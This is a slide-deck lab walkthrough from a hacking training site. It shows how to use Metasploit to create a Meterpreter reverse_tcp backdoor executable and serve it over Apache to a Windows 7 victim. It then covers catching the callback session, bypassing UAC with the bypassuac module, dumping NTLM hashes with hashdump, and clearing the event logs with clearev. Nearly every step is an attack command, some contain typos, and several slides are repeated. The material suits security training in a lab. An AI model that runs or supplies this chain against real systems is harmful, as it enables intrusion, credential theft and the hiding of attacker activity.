Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
1 like925 views
This document outlines a lab procedure for privilege escalation by exploiting client-side vulnerabilities using Metasploit. It details the setup of a testing environment, including the use of Windows 7 as a victim machine, executing various tasks to perform exploitation, and attempts to escalate privileges while addressing security configurations. The final objective is to successfully extract NTLM hashes and clear event logs after bypassing User Account Control settings.
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
- 1. 1 WWW.Prohackers.in Lab-4 “Privileges Esclation by Exploiting Client Side Vulnerabilities using Metasploit” By: -Vishal Kumar (CEH, CHFI, CISE, MCP) [email protected]
- 2. 2 WWW.Prohackers.in Table of content 1. Lab Scenario 2. Lab Objective 3. Overview of Lab 4. Lab Tasks 3.1 Task 01 :- Start postgresql and metasploit services 3.2 Task 02 : - Share Exploit.exe file 3.3 Task 03 : - Perform Exploitation 3.4 Task 04 : - Run the Exploit 3.4 Task 05 : - Establish a session
- 3. 3 WWW.Prohackers.in Task 01:- Start postgresql and metasploit services.
- 4. 4 WWW.Prohackers.in Note:- before performing this lab, log in to Kali-Linux virtual machine, click places → Computer. Navigate to File System → etc → apache2, open apache2.conf, enter the command servername localhost in a new line and save the file. Launch window 7 and login to its administrator account. Switch to Kali-Linux virtual machine and log in to it. Launch a command terminal, and type the command service postgresql start and press Enter. Now, type the other command service metasploit start and press Enter. ype the command msfconsole and press Enter to launch msfconsole. Type the command msfpayload windows/meterpreter/reverse_tcp LHOST=(IP of Kali-Linux) X > Desktop/Exploit.exe in msfconsole, and press Enter.
- 5. 5 WWW.Prohackers.in Tip: - Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The above command will create a Windows executable file named “Exploit.exe” and will be saved in Kali-Linux Desktop. Task 02:- Share Exploit.exe file.
- 6. 6 WWW.Prohackers.in Now you need to share Exploit.exe with the victim machine (in this lab we are using Windows 7 virtual machine as a victim machine). Open a new command line terminal, type the command mkdir /var/www/share and press Enter to create a new directory named Share. Tip: - To create a new directory share in www folder, following command is used: mkdir /var/www/share. Change the mode of the share folder to 755 by typing the command chmode -R 755 /var/www/share and press Enter Tip: - To change the mode of a share directory/folder, use the following command: chmode -R 755 /var/www/share/. Change the ownership of that folder to www-data, by typing the command chown - R www-data:www-data /var/www/share/ and press Enter. Tip: - To change the ownership of folder into www, use the following command: chown -R www-data /var/www/share/. Type the command ls -la /var/www/ | grep share and press Enter
- 7. 7 WWW.Prohackers.in The next step is to start the apache server. Type the command service apache2 start in terminal and press Enter. Now, that the apache web server is running, copy Exploit.exe into the share folder. Type the command cp /root/Desktop/Exploit.exe /var/www/share/ in the terminal, and press Enter Note:- To run the apache web server, use the following command: cp/root/.msf4/data/exploits/*/var/www/share/. Task 03:- Perform Exploitation. Switch back to msfconsole terminal to create a handler. Type use exploit/multi/handler and press Enter, to handle exploits launched outside the framework. Now, issue the following commands: o Type set payload windows/meterpreter/reverse_tcp and press Enter. Type set LHOST x.x.x.x (Kali-Linux IP address) and press Enter.
- 8. 8 WWW.Prohackers.in To start handler type the command: exploit -j -z and press Enter. Task 04:- Run the Exploit. Now, switch to windows 7 virtual machine. Launch web browser, and type the URL http://192.168.121.129/share/ in the address bar and press Enter You will be redirected to the apache index webpage. Click Exploit.exe link to download the backdoor file The opening Exploit.exe pop-up appears, click Save File. On completion of the download, a download notification appears in the browser. Click the Open Containing Folder icon. Tip:- To interact with the available session, you can use session -i <session_ID>.
- 9. 9 WWW.Prohackers.in Double-click Exploit.exe. If an open file - security warning appears, click Run. Switch back to Kali-Linux machine. Meterpreter session has been successfully opened, as shown in the following screenshot. Task 05:- Establish a session. Type session -i 1 and press Enter. (1 in session -i 1 command is the ID number of the session ). Meterpreter shell is launched, as shown in the following screenshot. Type getuid and press Enter. This displays the current user ID, as shown in the screenshot
- 10. 10 WWW.Prohackers.in You will observe that the Meterpreter server is running with normal user privileges. You will not be able to execute the commands (such as run hashdump, which dumps the user account hashes located in the SAM file; clearev, which clear the event logs remotely; etc.) that require administrative. Root privileges. Let us check this by using run hashdump command. The command fails to dump the hashes from the SAM file located in the windows 7 and returns an error stating that access is denied. From this, it is evident that Meterpreter server requires admin privileges to perform such actions. Now, we shall try to escalate the privileges by issuing getsystem command that attempts to elevate the user privileges. The command issued is: o Getsystem -t 1: which use the Service - Named Pipe Impersonation (In Memory/Admin) Technique? The command fails to escalate privileges and return an error stating Access is Denied.
- 11. 11 WWW.Prohackers.in From the above result, it is evident that the security configuration of the Windows 7 machine is blocking you from gaining unrestricted access to it. Now, we shall try to bypass the user account control setting that is blocking you. You will now: o Background the current meterpreter session, o Use the bypassuac exploit for windows, o Set meterpreter/reverse_tcp payload, o Configure the exploit and payload, o Exploit the machine using the above configuration payload in attempt to elevate the privileges. Type background and press Enter. This command background the current meterpreter session Type use exploit/windows/local/bypassuac and press Enter. Here you need to configure the exploit. To know what all options you need to configuration in the exploit, type show options and press Enter The Module options section appears, displaying the requirements for the exploit. You will observe that:
- 12. 12 WWW.Prohackers.in o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option. Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter Now, that we have configured the exploit, our next step will be to set a payload and configure it. Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload. The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter.
- 13. 13 WWW.Prohackers.in The Module options section appears, displaying the requirements for the exploit. You will observe that: o The SESSION option is required, but the current setting is empty. Here, you need to set the current meterpreter session that is obtained during the exploiting (i.e session 1). o The TECHNIQUE option is required, but the current setting is already set to EXE, so ignore this option. Type set SESSION 1 (1 is the current meterpreter session which was backgrounded in this lab) and press Enter
- 14. 14 WWW.Prohackers.in Now, that we have configured the exploit, our next step will be to set a payload and configure it. Type set payload windows/meterpreter/reverse_tcp and press Enter, to set the meterpreter/reverse_tcp payload. The next step is to configure this payload. To know all the options you need to configure in the exploit, type show options and press Enter
- 15. 15 WWW.Prohackers.in The Module options section appears, displaying the previously configured exploit. Here you can observe that the session value is set. The Payload options sections displays the requirement for the payload. Observe that: o LHOST option is required, but the current setting is empty, here you need to set the IP address of the local host i.e. Kali-Linux ip address. o EXITFUNC option is required but the current setting is already set to precess, so ignore this options. o LPORT option is required, but the current setting is already set to port number 4444, so ignore this option. To set the LHOST option, type set LHOST 192.168.121.129 and press Enter. You have successfully configured the exploit and payload. Type exploit and press Enter. This begins to exploit the UAC settings in windows 7 machine. As you can see, BypassUAC exploit has successfully bypass the UAC settings on windows 7 machine; you have now successfully attained a meterpreter session. Now, let us check the current User ID statue of meterpreter. You will observe that Meterpreter server is still running with normal user privileges. Type getuid and press Enter.
- 16. 16 WWW.Prohackers.in Let us check if we have successfully attained the SYSTEM/admin privileges by issuing a meterpreter command that require these privileges in order to be executed. For instance, we shall try to obtain hashes located in SAM file of windows 7. Type the command run hashdump and press Enter, this time meterpreter successfully extracted the NTLM hashes and display them as shown in the following screenshot. Thus you have successfully escalate the privileges by exploiting windows 7 machine’s vulnerability. You can now execute commands (clearev, which clears the event logs remotely, etc) that require administrative/ root privileges
- 17. 17 WWW.Prohackers.in Tool/Utility Information Collected/Objectives Achieved Metasploit Framework Console (msfconsole) IP Address Range/target:- Windows 7 machine Scan Result:- Hacking windows 7. Escalating the privileges. Extracting the NTLM Hashes from the SAM file. Clear the event log. Thanks for reading this presentation Please give us your feedback at [email protected] Your feedback is most valuable for us for improving the presentation You can also suggest the topic on which you want the presentation Website: www.prohackers.in FB page: www.facebook.com/theprohackers2017 Join FB Group: www.facebook.com/groups/group.prohackers/ Watch us on: www.youtube.com//channel/UCcyYSi1sh1SmyMlGfB-Vq6A ***Thanks***